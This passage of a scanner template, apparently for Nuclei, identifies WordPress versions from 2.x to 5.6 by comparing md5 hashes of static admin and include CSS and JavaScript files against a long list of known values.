"(\"517db4d19d1e3484a0339dc765cd3902\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"c449b708d25d875ac9266227666fef95\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.4.4 - dsl: - - "(\"b440cfaf53dc78b60e479c8e43df12d1\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"1e7b5cfcfc656cad1c8dcd3bb09ee8ca\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6c1db6b35d1f5b39a367f03fbbb6363e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/dashboard.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"702dabe21678b2f96b0c3fac9ca9eecf\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"ede40a4a2c18bee8b93c01f7e55245a8\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"b5bac004a9dd8890f14b020f7f548040\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"e97cda60d14a219554405c5df6047a54\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"ef190537aee285d82bb5fe4c5da5e769\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"c178ee058ec19c709f30baed82db8392\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"68e539081693b1ed4a42bf1c284004e6\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"8f73d561f6b239083463a5b1ea50d035\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"31d0d7ea28f6021402faeb6c25b7f24b\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"319ae2dfe4ba7ad0b5c1da8c5035205d\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"1e3ac8152f5ff972260ce1bd50bde322\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"7e89f21add33a9ee22decb147300999a\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"41abd505872ec8ad7625b81f5127546d\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"0b99a456a17fe95b10a8c7cf90d62303\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"9c505ae63a80736883260c90740e2e7c\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"0e0efc8f81e44620d3e1b3360fb8c492\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"2b1e8f9afa852875136abc86f8db2971\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"f43654c38bdb2158af5d710dba80f5bd\" == md5(body))" - - type: dsl - name: 4.9.8 - dsl: - - "(\"1b298abbb4fc1c8a793ab429afbac7a7\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"1aef04d8948c142c1e238d7c5d261a1c\" == md5(body))" - - type: dsl - name: 4.9.9 - dsl: - - "(\"117c2f9b3f7bb835979c8181c4bb4487\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"eba9cfc7bfc0ee9b9b41b6e57b951076\" == md5(body))" - - type: dsl - name: 4.9.10 - 4.9.16 - dsl: - - "(\"776fe952791cbf65cbef30a3828f94dc\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"e75bc9587fbb4bbf66b3e6165c4b96d2\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"7ef55edc418714bcd23d68126ad77914\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"6de79274a839f563f9c4233eaf2c41d0\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c155cc474428d39c756c4d0b259e0fda\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9142efd37952e7c5975acae53d56774b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"baaf01bcea21f0d7518fdbb36fee9134\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/media-views-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"e9b56ecbae4ea9a783fbbd5c7d600e2a\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"501cf1920c7156d8fc36d09906b89b96\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"0f5b4dc649f5d2218067a8c37e7c1bab\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"fa5c93754d9aaef90f7e56b8f530953f\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a00d887d69696c4469e02f21cce67a2c\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"fe2e1045e95e3356a585bb83c8958fe0\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"ce5832715f15e339b10f1f35564c1e54\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"113badd2d3bd1c9cec6ae9b51cf9d14a\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"596175f22e2a4fda17b151a548d943dc\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"d290d20fcf52a06c1576ce599294b0ec\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"fa31efdb33a5f6043c48bf062b78d306\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"0896c8e772550ccc25dbf41ad56828f6\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"eda317820fb1056837abb407ce52dd04\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"340776735208b7aa98106a0ac81ebeba\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"82886b7f245be648136f1d1633d7679d\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"d8606417bf53703b949f2b69f20950cd\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"03376b367c5b4d20cf8b8f4bc57f9899\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"fb3b1ff76a82bbf28c67694645d20343\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"b428a1ab8ea43aa8b32f70f567adbbcd\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"dfd4a99ee490100037c2fffb64b476af\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"7953c80077f3153b928f51614f2e1d73\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"cd9ae7fa20656d6518f8b02d41f543cd\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"aa26cc77c06589e911cab9b7a0e1f948\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"9df090212f0362c5ce6510e574a8bedf\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"8664869848abca0bd76593b7940f229c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"74c9253d442013dc9c4004e7fb5f8ad0\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3853f794c6941d2d221ffb81d657bab0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/media-views.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"0e78a2b0ea5e6d76af956e6db3c6d387\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"8da4dec91cff43f7f5dc6e44746ed049\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"251ddd705433c207dac4dc90b01abbe3\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"fbadbb1f370542f387ec6449a41869a5\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"5c63b51785fe9035948a1556dfec5204\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"6002f66791922cb455a1cbdcfb3e5d6e\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"cec1bd5b35322ae89736b592fd56f90d\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"34039211eb84b4c4ef8f040e7da8fb01\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"c3b623bad8cdeb9189d7ee1e6c4b6840\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"a1ed9196e49fd033bff15737cbd393ef\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"b15bc1e4a10cd3cd2e9e1a8af26cb82c\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"d88c98cdb5bf2fe29417d2b92f5288c7\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"fe5dfd54c06a5ca076027fb6463d53e0\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"0642e47790eb3ebff77ad8451b11bf7d\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"a11a31cf8171325483629eaf4cadfe2e\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"49800720b23abe08b209608f73d2c60d\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"4812195c34e86b684243abbc1d8d1798\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6754ac27669188d7fe33c6699290101a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"830d9f3be0c02ffb4bea5a1bbc8c342c\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"f78d67d8230c458780252e608257665e\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"9fbd0c31aaf5fd708bad7ceae55cd1c6\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"4085d31428188b517d4cdc6ed54e9ba1\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"d37e9d97322d003a59cceed023ae1627\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"0de070a44c7ba72af44ccd496608395c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"de068d48d84fefc1c50a0b65253b7d41\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"18cb9cc6eb79acab95454d92d1a6832a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/forms.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"766884f8982e0b24a1ff31017b12687c\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"70fa643d71370cbaafe974ad9ca04569\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"ccae6ea537526abc82f16abac64b14fc\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"e113d75d86aa496a5aeebc79a426e09a\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"ad3c820c92c5f7916448a38c7439bdf9\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"8ab3dc5d6517e5fb1615317ef16d9f7c\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"82a7baa833cfa3cacffe1567f417388e\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"018517f65641a4cfb139781686700457\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"8f95818bedd2456f61d3f82926bbe549\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"e8ad927ed99f0cb598babf3c97c08db3\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a198106b212083f8421da7a3946757f4\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"7d6a4fb31d233dcee4eba2d3bc781350\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"fd519c207095336bb57294926a09461e\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"b4ddb8d0e6def1544aac502784180669\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"3133e7d3687ba997b268a0d0b920f7ca\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"01537666f87f8a05ef7bfabf9e02dd58\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"1b5477771d13050c5543044bf233a88e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"273583b8f46a71877db8a1343ae5c54f\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"47956eace9eccbe53bc9dcc66e1264fd\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.2 - dsl: - - "(\"a4e3d3f66e8aa6a5a1e74ea06d5a94c7\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"6e2d5da90f7faf390eb60d3554e2ff58\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"76a6b8c3745571f1ed6aed74029fe6db\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"81be30220791444b0d18847ebbe35ad1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"3a62029975958cf5dedeea2b4991082c\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"2497dbd6fa8ed7ec01aaa5cde5b41311\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"abc9cd9c8ba828a3ee119f294425c92a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"658bf53ecc9983a2cc34c2fb10ff4fca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/forms-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"111ecdd53198846995ebd8efec9bcf36\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"195f55f6344af6ab4483de40fcaf6d46\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"42ce72342f0513eef908ca9dbd9305ea\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"7cdd958d566eef0a2bbd01d6f9f9499b\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"abf8dd8f42af5684f3d80d6447e1314b\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"03c4f503d77c221c7db24be17eb1883d\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"5d83454881d2a694d0593ae6c209778c\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"62dea19210ec49e75a896a9965799ca4\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"fe5319684165959b7b00b618009c3e81\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"6dc7476f6b2484c728ed3cd733ac80bb\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"044393b752b8a95cdd5a8ccfccf98c6f\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"ed2dded7dd6599eb0976eb63208b8e8c\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"4719697b45dc80a4b21ac12c129ad378\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"92fa624428349c1a4c9aa6eeee9400a3\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"c1d87fb1e7d4b5f8d925c59f2dcfa076\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"d76404feb79abd2167325e82891123b2\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"2113853f02adcfec75306e443c560e3b\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"0fa8523bd6c90b087064560f29457c1f\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"3eceec285e1cce89f64e729cfa5bbcb7\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.2 - dsl: - - "(\"7d0250392ecd5799d667112dd3c6c1d8\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"4c81508db6b5bb1c1c14764862b98360\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"5d93609886b767b6a3f7faee2dbeaea7\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"dc4fc10c6cfd9719b4162726645fceb1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"202c34af21873c6dafca17c5d7506706\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"d010d243e2c088bda116a757e7566bda\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f59d6904ead9d4a9bf1f48cb3b7f9c56\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"dd75b8c4476592195e9b774d0841ab15\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/media.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"4423bb74b238cb0e01427506aaf6ad29\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"48babc981cf0f439a769286d6a70fd48\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"4d625d7805a6897ba1ee60df12e9aedc\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6dcb8d45250f00e45c0a16d7d437c0d8\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"427ae769ce0a7429d7f31ed97c0c3326\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"4bd7f1b4b0aecd69638848b6c37851ff\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f578fae6b47beea325ee8dc1a8551e88\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"71386ae29d2e92d744cd0ffcfe901ff2\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"246e5b303936e280ba11653683726659\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"2b9341dc649763de1f36a2995bfcfbe1\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"8d6aec11f42294c4ae1de3ab84175e2b\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"163d75e9faf70bf4e002638b746af26d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a91b399efcdb75b5975efae2bcbe0588\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"7e7fc988037a570623ecdac12c6e523a\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"cc05fe38ba18674e7c6ab01c4dff6e4f\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"eedf339656fe12ca835e797320445e34\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"07c2d345729f31a530872a202078fe3e\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"7ae4b6de28dfa29eaf07b5448e27c47a\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"7585650095d07481bf58bac7737e0d0c\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"56b3176fa896ff69ebea6d6689f1b5df\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"adc9f326e31941258e8e50707a93c1eb\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"eb025ed3405f65138e2fe7cd62b27508\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"3bc7a38b3a83079b9abd2245709f7b2b\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"73fe3708cb1c253dd50d5be65f8777dd\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"fe3a02ff20d8154cdd66aad359c8a8e4\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6875a80f6acd9176e518bcd86c364a91\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2ca82cd79424ae65f081f348da6f3470\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.1 - dsl: - - "(\"38de8fc52993f0f910be3d62a7637c33\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"16375f6512d5a1e04dbb884a02ba658a\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"6f3943ff4694f87dae30d02cfba0d89f\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"856763d80eab181268a361510f4f2e35\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"f8a412c8321caa8f9fc3b9d6ed078740\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"ebd0cc92129d8f29fa8b66daa23215eb\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"fb09060e3a7d4ab6357a830546acb8b2\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9369c3961b4f2d155e6a4ea8252e31ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/autosave.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"6cfac42246a04c9f37f0a0e5f0474ee4\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"44521ff25481d95b5d100c55dfdb45f4\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.5.23 - dsl: - - "(\"3f9cc5665ff4fe488894068b1b880d74\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"413b428336916273e3853a581f5ab851\" == md5(body))" - - type: dsl - name: 4.1 - 4.3.25 - dsl: - - "(\"63fd697c7d66f00cefc6430b8c53c92f\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"b14a525c6e9153ceaa71eb4561ac5991\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"fddaef0932cdd73ecf654d5d40a98ff0\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"863c40a4a54cf53e5102a5133faa19f8\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"8a6348b4b6ccb6fdc485912383cddb04\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"2c5edd9df2864f480f946256022c9f44\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"00172ff53b67ee3b773504420e7de431\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"f74c1ba83ff35888d3dd2e3521897db5\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"dd01c7f5e1b9ca4326267bd246dbd770\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"c524fa61292b138710930f5ccf1dcd23\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"e617e3e2931143c28cb3514d2db5b583\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"3f03bce84d1d2a169b4bf4d8a0126e38\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"f00b01f80b2ed4e5f6753b602258874c\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"1f09b6343caf9dc71b30d0ff0d90c69b\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"aebe2414d81a87d6c2c9273654035fcd\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"0c2295f3e8ea03dd5346a6abec16a456\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"a436fd5bc5fe11fed6acbd8371e09102\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"4d76da5b913eec43f31a10b6c367f43e\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"6e0efaa35b424792e180c3c619b9823f\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"9b1d754d27a657a24b8268d87a4a96ad\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"e0024121a80cefb48c958fc6995db24b\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"0b4536fbe48b791795347557f46f4efe\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4536ea8aec28f17e07af54c59db561a2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/common-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"f4496a75c16e381d993ec316e783f9bb\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"57d1d231d84d16e1068f6af8219c16bb\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"1299184d799f3a39b6abfb8510ae2b88\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"04e2e4400bf7e6b04c7a9e0bef9abd92\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"65a579b1e541380cf3336329c84549fa\" == md5(body))" - - type: dsl - name: 4.9.2 - 4.9.4 - dsl: - - "(\"66c0c54fea80c201db7daabadef8cd8b\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"eca5a62aacdb686c26e850a4529662a8\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"cc1d6cd9b4a4079012a04ec96638bbf4\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.9 - dsl: - - "(\"29fc9bc51f8f284c4751acb59307c07a\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"803ea865916c3973a37a371542e92383\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"96c50e7ed61f473ae43fea164c028c5a\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"96705cdff8c2ed47003b981751c25d99\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"4f01f1edbe0fd8a3c68bbdac926be2fe\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"a3598123987864a73435983381d38259\" == md5(body))" - - type: dsl - name: 5.2.2 - dsl: - - "(\"f6f2b87658db8690a979b86c13bc869f\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"e11e33d6475e302b41caa4020143b224\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"1f735128e0e972560912127d06a124cf\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"59b2a3edb413dba510ec0624445d35d7\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.1 - dsl: - - "(\"3ef1bf8fd20257c9285115ad1a514cb2\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"de8f811db5ab98f7759282ebc81b4dcb\" == md5(body))" - - type: dsl - name: 5.4.2 - 5.4.4 - dsl: - - "(\"dd21416d0bf77cf56c6e29abe9d806d7\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"2844ed0207b54d314de52aa5024a188c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"518511a9badf54b58f9a724a67be1599\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/common-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"3ed49f9aee0b3dc258e936fa867da7b7\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"86ccf56bbf7478ef06b2bf12e93bdc3c\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"2a0f5af4182bc19d0c8a64a537ea950f\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"1ed4faf7c47d02536474cfbe258892ba\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"8d6461b9e7a10f2635880587e37688c8\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"3b0c7a4c53c44f527276ed85520f94f8\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"81f0f785dbd8eee0a11d054a3cbdf606\" == md5(body))" - - 